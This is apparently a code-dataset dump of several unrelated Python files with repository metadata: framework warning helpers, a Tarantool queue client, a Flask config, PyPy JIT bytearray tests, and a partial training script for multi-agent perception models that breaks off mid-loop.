def later_framework_version_warning(latest_version):
return LATER_FRAMEWORK_VERSION_WARNING.format(latest=latest_version)
def warn_if_parameter_server_with_multi_gpu(training_instance_type, distributions):
if training_instance_type == "local" or distributions is None:
return
is_multi_gpu_instance = (
training_instance_type == "local_gpu"
or training_instance_type.split(".")[1].startswith("p")
) and training_instance_type not in SINGLE_GPU_INSTANCE_TYPES
ps_enabled = "parameter_server" in distributions and distributions["parameter_server"].get(
"enabled", False
)
if is_multi_gpu_instance and ps_enabled:
logger.warning(PARAMETER_SERVER_MULTI_GPU_WARNING)
def get_unsupported_framework_version_error(
framework_name, unsupported_version, supported_versions
):
return UNSUPPORTED_FRAMEWORK_VERSION_ERROR.format(
framework_name,
unsupported_version,
", ".join('"{}"'.format(version) for version in supported_versions),
)
def python_deprecation_warning(framework, latest_supported_version):
return PYTHON_2_DEPRECATION_WARNING.format(
framework=framework, latest_supported_version=latest_supported_version
)
def parameter_v2_rename_warning(v1_parameter_name, v2_parameter_name):
return PARAMETER_V2_RENAME_WARNING.format(
v1_parameter_name=v1_parameter_name, v2_parameter_name=v2_parameter_name
)
def _region_supports_debugger(region_name):
return region_name.lower() not in DEBUGGER_UNSUPPORTED_REGIONS
| true
| true
|
1c3e9feb8acf4bdd8e0ad18e90e1fc824b44b79c
| 2,294
|
py
|
Python
|
sandbox/lib/jumpscale/JumpScale9/clients/tarantool/TarantoolQueue.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | null | null | null |
sandbox/lib/jumpscale/JumpScale9/clients/tarantool/TarantoolQueue.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | 1
|
2018-04-04T12:13:40.000Z
|
2018-05-03T07:57:52.000Z
|
sandbox/lib/jumpscale/JumpScale9/clients/tarantool/TarantoolQueue.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | null | null | null |
from js9 import j
import tarantool
from .TarantoolDB import TarantoolDB
# import itertools
# import sys
# sys.path.append(".")
# from tarantool_queue import *
import tarantool
JSBASE = j.application.jsbase_get_class()
class TarantoolQueue(JSBASE):
def __init__(self, tarantoolclient, name, ttl=0, delay=0):
"""The default connection parameters are: host='localhost', port=9999, db=0"""
JSBASE.__init__(self)
self.client = tarantoolclient
self.db = self.client.db
self.name = name
if ttl != 0:
raise RuntimeError("not implemented")
else:
try:
self.db.eval('queue.create_tube("%s","fifottl")' % name)
except Exception as e:
if "already exists" not in str(e):
raise RuntimeError(e)
def qsize(self):
"""Return the approximate size of the queue."""
return self.__db.llen(self.key)
def empty(self):
"""Return True if the queue is empty, False otherwise."""
return self.qsize() == 0
def put(self, item, ttl=None, delay=0):
"""Put item into the queue."""
args = {}
if ttl is not None:
args["ttl"] = ttl
args["delay"] = delay
self.db.call("queue.tube.%s:put" % self.name, item, args)
# else:
# #TODO: does not work yet? don't know how to pass
# self.db.call("queue.tube.%s:put"%self.name,item)
def get(self, timeout=1000, autoAcknowledge=True):
"""
Remove and return an item from the queue.
if necessary until an item is available.
"""
res = self.db.call("queue.tube.%s:take" % self.name, timeout)
if autoAcknowledge and len(res) > 0:
res = self.db.call("queue.tube.%s:ack" % self.name, res[0])
return res
def fetch(self, block=True, timeout=None):
""" Like get but without remove"""
if block:
item = self.__db.brpoplpush(self.key, self.key, timeout)
else:
item = self.__db.lindex(self.key, 0)
return item
def set_expire(self, time):
self.__db.expire(self.key, time)
def get_nowait(self):
"""Equivalent to get(False)."""
return self.get(False)
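# Illustrative usage sketch, not part of the original file. It assumes a connected JumpScale9
# tarantool client object is already available as `tt_client`; how that client is obtained
# depends on the deployment and is not shown here.
def _example_queue_roundtrip(tt_client):
    q = TarantoolQueue(tt_client, name="demo")
    q.put("hello")              # enqueue into the "demo" fifottl tube
    task = q.get(timeout=1000)  # take the task and acknowledge it (autoAcknowledge=True)
    return task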
| 29.792208
| 86
| 0.576286
|
from js9 import j
import tarantool
from .TarantoolDB import TarantoolDB
import tarantool
JSBASE = j.application.jsbase_get_class()
class TarantoolQueue(JSBASE):
def __init__(self, tarantoolclient, name, ttl=0, delay=0):
JSBASE.__init__(self)
self.client = tarantoolclient
self.db = self.client.db
self.name = name
if ttl != 0:
raise RuntimeError("not implemented")
else:
try:
self.db.eval('queue.create_tube("%s","fifottl")' % name)
except Exception as e:
if "already exists" not in str(e):
raise RuntimeError(e)
def qsize(self):
return self.__db.llen(self.key)
def empty(self):
return self.qsize() == 0
def put(self, item, ttl=None, delay=0):
args = {}
if ttl is not None:
args["ttl"] = ttl
args["delay"] = delay
self.db.call("queue.tube.%s:put" % self.name, item, args)
def get(self, timeout=1000, autoAcknowledge=True):
res = self.db.call("queue.tube.%s:take" % self.name, timeout)
if autoAcknowledge and len(res) > 0:
res = self.db.call("queue.tube.%s:ack" % self.name, res[0])
return res
def fetch(self, block=True, timeout=None):
if block:
item = self.__db.brpoplpush(self.key, self.key, timeout)
else:
item = self.__db.lindex(self.key, 0)
return item
def set_expire(self, time):
self.__db.expire(self.key, time)
def get_nowait(self):
return self.get(False)
| true
| true
|
1c3ea22503288aedcd8f44cb6c69cdf7b6831548
| 1,362
|
py
|
Python
|
config.py
|
ibbad/dna-lceb-web
|
b4c1d4e121dfea992e072979bfdc0f313c781e32
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
ibbad/dna-lceb-web
|
b4c1d4e121dfea992e072979bfdc0f313c781e32
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
ibbad/dna-lceb-web
|
b4c1d4e121dfea992e072979bfdc0f313c781e32
|
[
"Apache-2.0"
] | null | null | null |
"""
Configuration file for the application.
"""
import os
from helpers.helper_functions import generate_secret_key
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or generate_secret_key()
SSL_DISABLE = False
CSRF_ENABLED = False
@staticmethod
def init_app(app):
pass
class TestingConfig(Config):
TESTING = True
WTF_CSRF_ENABLED = False
class DevelopmentConfig(Config):
DEBUG = True
class ProductionConfig(Config):
@classmethod
def init_app(cls, app):
Config.init_app(app)
# email errors to the administrators
class HerokuConfig(ProductionConfig):
SSL_DISABLE = bool(os.environ.get('SSL_DISABLE'))
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# handle proxy server headers
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
# log to stderr
import logging
from logging import StreamHandler
file_handler = StreamHandler()
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'heroku': HerokuConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
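# Illustrative sketch, not part of the original file: how the `config` mapping above is
# typically consumed by a Flask application factory. `create_app` and the Flask import are
# assumptions for illustration, not code from this repository.
from flask import Flask
def create_app(config_name='default'):
    app = Flask(__name__)
    app.config.from_object(config[config_name])  # load the selected Config subclass
    config[config_name].init_app(app)            # run any class-specific initialisation
    return app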
| 21.619048
| 70
| 0.69163
|
import os
from helpers.helper_functions import generate_secret_key
basedir = os.path.abspath(os.path.dirname(__file__))
class Config:
SECRET_KEY = os.environ.get('SECRET_KEY') or generate_secret_key()
SSL_DISABLE = False
CSRF_ENABLED = False
@staticmethod
def init_app(app):
pass
class TestingConfig(Config):
TESTING = True
WTF_CSRF_ENABLED = False
class DevelopmentConfig(Config):
DEBUG = True
class ProductionConfig(Config):
@classmethod
def init_app(cls, app):
Config.init_app(app)
class HerokuConfig(ProductionConfig):
SSL_DISABLE = bool(os.environ.get('SSL_DISABLE'))
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
from werkzeug.contrib.fixers import ProxyFix
app.wsgi_app = ProxyFix(app.wsgi_app)
import logging
from logging import StreamHandler
file_handler = StreamHandler()
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
config = {
'development': DevelopmentConfig,
'testing': TestingConfig,
'heroku': HerokuConfig,
'production': ProductionConfig,
'default': DevelopmentConfig
}
| true
| true
|
1c3ea2273509fcdf5847621ef551c86264756c7a
| 2,224
|
py
|
Python
|
rpython/jit/metainterp/test/test_bytearray.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 381
|
2018-08-18T03:37:22.000Z
|
2022-02-06T23:57:36.000Z
|
rpython/jit/metainterp/test/test_bytearray.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 16
|
2018-09-22T18:12:47.000Z
|
2022-02-22T20:03:59.000Z
|
rpython/jit/metainterp/test/test_bytearray.py
|
nanjekyejoannah/pypy
|
e80079fe13c29eda7b2a6b4cd4557051f975a2d9
|
[
"Apache-2.0",
"OpenSSL"
] | 55
|
2015-08-16T02:41:30.000Z
|
2022-03-20T20:33:35.000Z
|
import py
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.rlib.jit import JitDriver, dont_look_inside
class TestByteArray(LLJitMixin):
def test_getitem(self):
x = bytearray("foobar")
def fn(n):
assert n >= 0
return x[n]
res = self.interp_operations(fn, [3])
assert res == ord('b')
def test_getitem_negative(self):
x = bytearray("foobar")
def fn(n):
return x[n]
res = self.interp_operations(fn, [-2])
assert res == ord('a')
def test_len(self):
x = bytearray("foobar")
def fn(n):
return len(x)
res = self.interp_operations(fn, [3])
assert res == 6
def test_setitem(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
assert n >= 0
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [3])
assert res == 3 + 1000 * ord('a')
def test_setitem_negative(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [-2])
assert res == ord('b') + 1000 * 3
def test_new_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
x[m] = 0x34
return int(str(x))
assert fn(610978, 3) == 610478
res = self.interp_operations(fn, [610978, 3])
assert res == 610478
def test_slice(self):
py.test.skip("XXX later")
def fn(n, m):
x = bytearray(str(n))
x = x[1:5]
x[m] = 0x35
return int(str(x))
res = self.interp_operations(fn, [610978, 1])
assert res == 1597
def test_bytearray_from_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
y = bytearray(x)
x[m] = 0x34
return int(str(x)) + int(str(y))
res = self.interp_operations(fn, [610978, 3])
assert res == 610478 + 610978
| 26.795181
| 58
| 0.504946
|
import py
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.rlib.jit import JitDriver, dont_look_inside
class TestByteArray(LLJitMixin):
def test_getitem(self):
x = bytearray("foobar")
def fn(n):
assert n >= 0
return x[n]
res = self.interp_operations(fn, [3])
assert res == ord('b')
def test_getitem_negative(self):
x = bytearray("foobar")
def fn(n):
return x[n]
res = self.interp_operations(fn, [-2])
assert res == ord('a')
def test_len(self):
x = bytearray("foobar")
def fn(n):
return len(x)
res = self.interp_operations(fn, [3])
assert res == 6
def test_setitem(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
assert n >= 0
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [3])
assert res == 3 + 1000 * ord('a')
def test_setitem_negative(self):
@dont_look_inside
def make_me():
return bytearray("foobar")
def fn(n):
x = make_me()
x[n] = 3
return x[3] + 1000 * x[4]
res = self.interp_operations(fn, [-2])
assert res == ord('b') + 1000 * 3
def test_new_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
x[m] = 0x34
return int(str(x))
assert fn(610978, 3) == 610478
res = self.interp_operations(fn, [610978, 3])
assert res == 610478
def test_slice(self):
py.test.skip("XXX later")
def fn(n, m):
x = bytearray(str(n))
x = x[1:5]
x[m] = 0x35
return int(str(x))
res = self.interp_operations(fn, [610978, 1])
assert res == 1597
def test_bytearray_from_bytearray(self):
def fn(n, m):
x = bytearray(str(n))
y = bytearray(x)
x[m] = 0x34
return int(str(x)) + int(str(y))
res = self.interp_operations(fn, [610978, 3])
assert res == 610478 + 610978
| true
| true
|
1c3ea39888e2088ce257dfe36ae474d9f6acca2d
| 42,615
|
py
|
Python
|
pair_fast_forecast_distributed/pairwise_fusion_kd/train_faf_com_kd.py
|
Chezacar/CollaborationWithLatency
|
da06abea16f1ffcafc35d27cb69ae3116a345965
|
[
"MIT"
] | null | null | null |
pair_fast_forecast_distributed/pairwise_fusion_kd/train_faf_com_kd.py
|
Chezacar/CollaborationWithLatency
|
da06abea16f1ffcafc35d27cb69ae3116a345965
|
[
"MIT"
] | null | null | null |
pair_fast_forecast_distributed/pairwise_fusion_kd/train_faf_com_kd.py
|
Chezacar/CollaborationWithLatency
|
da06abea16f1ffcafc35d27cb69ae3116a345965
|
[
"MIT"
] | null | null | null |
# Copyright 2021 MediaBrain Group of CMIC, Shanghai Jiao Tong University. All right reserved.
# The software, documentation and/or data in this file is provided on an "as is" basis,
# and MediaBrain Group has no obligations to provide maintenance, support, updates, enhancements or modifications.
# MediaBrain Group specifically disclaims any warranties, including, but not limited to,
# the implied warranties of merchantability and fitness for any particular purpose.
# In no event shall MediaBrain Group be liable to any party for direct, indirect, special, incidental,
# or consequential damages, including lost profits, arising out of the use of this software
# and its documentation, even if MediaBrain Group has been advised of the possibility of such damages.
# As more fully described in the license agreement that was required in order to download this software,
# documentation and/or data, permission to use, copy and modify this software without fee is granted,
# but only for educational, research and non-commercial purposes.
from utils.model import forcast_lstm
import random
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.distributed as dist
import torch.multiprocessing as mp
import numpy as np
import time
import sys
import argparse
import os
from shutil import copytree, copy
from utils.model import MotionNet
from utils.FaFModule import *
from utils.loss import *
from data.data_com_parallel import NuscenesDataset, CarscenesDataset
from data.config_com import Config, ConfigGlobal
from utils.mean_ap import eval_map
from tqdm import tqdm
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
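# Illustrative usage sketch, not part of the original training script: AverageMeter keeps a
# running mean, so per-batch losses can be accumulated and reported with the format spec above.
def _example_average_meter():
    meter = AverageMeter('Total loss', ':.6f')
    for batch_loss in (0.9, 0.7, 0.5):
        meter.update(batch_loss)  # n defaults to 1 sample per update
    print(meter)                  # prints roughly "Total loss 0.500000 (0.700000)"
    return meter.avg              # (0.9 + 0.7 + 0.5) / 3, roughly 0.7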
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
# def setup(rank = -1, world_size = -1):
# os.environ['MASTER_ADDR'] = 'localhost'
# os.environ['MASTER_PORT'] = '12355'
# dist.init_process_group("gloo", rank=rank, world_size=world_size)
# def cleanup():
# dist.destroy_process_group()
# def main_worker(gpu, para_list):
def main(config, config_global, args):
# [ngpus_per_node,config, config_global, args] = para_list
# args.gpu = gpu
# args.rank = args.rank * ngpus_per_node + gpu
# dist.init_process_group(backend='nccl', init_method='tcp://127.0.0.1:23456', world_size=ngpus_per_node, rank=gpu)
# torch.cuda.set_device(args.rank)
num_epochs = args.nepoch
need_log = args.log
num_workers = args.nworker
only_load_model = args.model_only
forcast_num = args.forcast_num
start_epoch = 1
# communicate a single layer [0: 32*256*256, 1: 64*128*128, 2: 128*64*64, 3: 256*32*32, 4: 512*16*16] [C, W, H]
layer = args.layer
batch_size = args.batch
# Specify gpu device
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# device_num = torch.cuda.device_count()
# print("device number", device_num)
# torch.cuda.set_device(6)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '5678'
dist.init_process_group(backend='nccl',rank=1,world_size=2)
    torch.cuda.set_device(2)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")  # device used by the .to(device) calls below
if args.mode == 'train':
# Whether to log the training information
if need_log:
logger_root = args.logpath if args.logpath != '' else 'logs'
time_stamp = time.strftime("%Y-%m-%d_%H-%M-%S")
if args.resume == '':
model_save_path = check_folder(logger_root)
model_save_path = check_folder(os.path.join(model_save_path, 'train_single_seq'))
model_save_path = check_folder(os.path.join(model_save_path, time_stamp))
log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "w")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
# Logging the details for this experiment
saver.write("command line: {}\n".format(" ".join(sys.argv[0:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
# Copy the code files as logs
copytree('nuscenes-devkit', os.path.join(model_save_path, 'nuscenes-devkit'))
copytree('data', os.path.join(model_save_path, 'data'))
python_files = [f for f in os.listdir('.') if f.endswith('.py')]
for f in python_files:
copy(f, model_save_path)
else:
model_save_path = args.resume[:args.resume.rfind('/')]
torch.load(args.resume) # eg, "logs/train_multi_seq/1234-56-78-11-22-33"
log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "a")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
# Logging the details for this experiment
saver.write("command line: {}\n".format(" ".join(sys.argv[1:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
# load data from multiple agents
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', split='train', config=config)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example = data_nuscenes[0]
trainset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='train', forcast_num = forcast_num)
# trainset0 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent0', config=config, config_global=config_global,
# split='train', center_agent = 0)
# trainset1 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent1', config=config, config_global=config_global,
# split='train', center_agent = 1)
# trainset2 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent2', config=config, config_global=config_global,
# split='train', center_agent = 2)
# trainset3 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent3', config=config, config_global=config_global,
# split='train', center_agent = 3)
# trainset4 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent4', config=config, config_global=config_global,
# split='train', center_agent = 4)
print("Training dataset size:", len(trainset))
if args.mode == 'val':
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', config=config, split='val', val=True)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example, _, _ = data_nuscenes[0]
valset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='val', val=True)
# valset0 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent0', config=config, config_global=config_global,
# split='val', val=True)
# valset1 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent1', config=config, config_global=config_global,
# split='val', val=True)
# valset2 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent2', config=config, config_global=config_global,
# split='val', val=True)
# valset3 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent3', config=config, config_global=config_global,
# split='val', val=True)
# valset4 = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
# reg_loss_mask_example, \
# anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
# dataset_root=args.data + '/agent4', config=config, config_global=config_global,
# split='val', val=True)
valloader = torch.utils.data.DataLoader(valset, batch_size=1, shuffle=False, num_workers=1)
# valloader0 = torch.utils.data.DataLoader(valset0, batch_size=1, shuffle=False, num_workers=1)
# valloader1 = torch.utils.data.DataLoader(valset1, batch_size=1, shuffle=False, num_workers=1)
# valloader2 = torch.utils.data.DataLoader(valset2, batch_size=1, shuffle=False, num_workers=1)
# valloader3 = torch.utils.data.DataLoader(valset3, batch_size=1, shuffle=False, num_workers=1)
# valloader4 = torch.utils.data.DataLoader(valset4, batch_size=1, shuffle=False, num_workers=1)
print("Validation dataset size:", len(valset))
# build model
if config.MGDA:
encoder = FeatEncoder()
encoder = nn.DataParallel(encoder)
encoder = encoder.to(device)
optimizer_encoder = optim.Adam(encoder.parameters(), lr=args.lr)
head = FaFMGDA(config)
head = nn.DataParallel(head)
head = head.to(device)
optimizer_head = optim.Adam(head.parameters(), lr=args.lr)
model = [encoder, head]
optimizer = [optimizer_encoder, optimizer_head]
elif config.MIMO:
if layer == 0:
model = FaFMIMONet_32_256_256(config)
elif layer == 1:
model = FaFMIMONet_64_128_128(config)
elif layer == 2:
if config.KD:
model = FaFMIMONet_128_64_64_KD(config)
else:
model = FaFMIMONet_128_64_64(config)
elif layer == 3:
if config.KD:
model = FaFMIMONet_256_32_32_KD(config)
else:
model = FaFMIMONet_256_32_32(config)
            model = DDP(model, device_ids=[args.rank])
else:
if config.KD:
model = FaFMIMONet_512_16_16_KD(config)
else:
model = FaFMIMONet_512_16_16(config)
model = nn.DataParallel(model)
model = model.to(device)
# specify optimizer
optimizer = optim.Adam(model.parameters(), lr=args.lr)
else:
model = FaFNet(config)
model = nn.DataParallel(model)
model = model.to(device)
# specify optimizer
optimizer = optim.Adam(model.parameters(), lr=args.lr)
    # specify criterion
criterion = {'cls': SoftmaxFocalClassificationLoss(), 'loc': WeightedSmoothL1LocalizationLoss()}
if config.KD:
teacher = FaFNet(config)
teacher = nn.DataParallel(teacher)
teacher = teacher.to(device)
fafmodule = FaFModuleKD(model, teacher, config, optimizer, criterion)
checkpoint_teacher = torch.load(args.resume_teacher)
start_epoch_teacher = checkpoint_teacher['epoch']
fafmodule.teacher.load_state_dict(checkpoint_teacher['model_state_dict'])
print("Load teacher model from {}, at epoch {}".format(args.resume_teacher, start_epoch_teacher))
else:
fafmodule = FaFModule(model, config, optimizer, criterion)
if args.resume != '' or args.mode == 'val':
checkpoint = torch.load(args.resume)
model_save_path = args.resume[:args.resume.rfind('/')]
start_epoch = checkpoint['epoch'] + 1
if only_load_model:
start_epoch = 0
if config.MGDA:
fafmodule.encoder.load_state_dict(checkpoint['encoder_state_dict'])
fafmodule.head.load_state_dict(checkpoint['head_state_dict'])
if not only_load_model:
fafmodule.scheduler_encoder.load_state_dict(checkpoint['scheduler_encoder_state_dict'])
fafmodule.optimizer_encoder.load_state_dict(checkpoint['optimizer_encoder_state_dict'])
fafmodule.scheduler_head.load_state_dict(checkpoint['scheduler_head_state_dict'])
fafmodule.optimizer_head.load_state_dict(checkpoint['optimizer_head_state_dict'])
else:
fafmodule.model.load_state_dict(checkpoint['model_state_dict'])
if not only_load_model:
fafmodule.scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
fafmodule.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
print("Load model from {}, at epoch {}".format(args.resume, start_epoch - 1))
if args.mode == 'train':
n_train = len(trainset)
indices = list(range(n_train))
data_cache = {}
for epoch in range(start_epoch, num_epochs + 1):
latency_num = (epoch - 100) / 10
latency_lambda = [latency_num, latency_num, latency_num, latency_num, latency_num]
print('latency of this epoch is', latency_lambda)
# trainset.seq_dict[0] = trainset.get_data_dict(trainset.dataset_root_peragent)
if config.MGDA:
lr = fafmodule.optimizer_head.param_groups[0]['lr']
else:
lr = fafmodule.optimizer.param_groups[0]['lr']
print("Epoch {}, learning rate {}".format(epoch, lr))
if need_log:
saver.write("epoch: {}, lr: {}\t".format(epoch, lr))
saver.flush()
running_loss_disp = AverageMeter('Total loss', ':.6f') # for motion prediction error
running_loss_class = AverageMeter('classification Loss', ':.6f') # for cell classification error
running_loss_loc = AverageMeter('Localization Loss', ':.6f') # for state estimation error
if config.MGDA:
fafmodule.scheduler_encoder.step()
fafmodule.encoder.train()
fafmodule.scheduler_head.step()
fafmodule.head.train()
else:
fafmodule.scheduler.step()
fafmodule.model.train()
step_ct = 1
t = time.time()
# random.shuffle(indices)
train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
# train_sampler = torch.utils.data.sampler.BatchSampler(torch.utils.data.sampler.SubsetRandomSampler(indices),
# batch_size=batch_size, drop_last=False)
            trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, sampler=train_sampler, num_workers=num_workers)
# trainloader1 = torch.utils.data.DataLoader(trainset1, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# trainloader2 = torch.utils.data.DataLoader(trainset2, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# trainloader3 = torch.utils.data.DataLoader(trainset3, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# trainloader4 = torch.utils.data.DataLoader(trainset4, shuffle=False, batch_sampler=train_sampler, num_workers=num_workers)
# for sample0, sample1, sample2, sample3, sample4 in tqdm(zip(trainloader0, trainloader1, trainloader2, trainloader3, trainloader4)):
time_10 = time.time()
for sample in tqdm(trainloader):
time_t0 = time.time()
print("返回时间", time_t0 - trainset.time_4)
# padded_voxel_points0, padded_voxel_points_teacher0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, target_agent_id0, num_sensor0, trans_matrices0,center_agent = sample
padded_voxel_points0, padded_voxel_points_teacher0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, target_agent_id0, num_sensor0, trans_matrices0, filename0 = sample[0]['padded_voxel_points'] ,sample[0]['padded_voxel_points_teacher'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'] ,sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'], sample[0]['filename']
padded_voxel_points1, padded_voxel_points_teacher1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, target_agent_id1, num_sensor1, trans_matrices1, filename1 = sample[1]['padded_voxel_points'] ,sample[1]['padded_voxel_points_teacher'] ,sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'] ,sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'], sample[1]['filename']
padded_voxel_points2, padded_voxel_points_teacher2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, target_agent_id2, num_sensor2, trans_matrices2, filename2 = sample[2]['padded_voxel_points'] ,sample[2]['padded_voxel_points_teacher'] ,sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'] ,sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'], sample[2]['filename']
padded_voxel_points3, padded_voxel_points_teacher3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, target_agent_id3, num_sensor3, trans_matrices3, filename3 = sample[3]['padded_voxel_points'] ,sample[3]['padded_voxel_points_teacher'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'] ,sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'], sample[3]['filename']
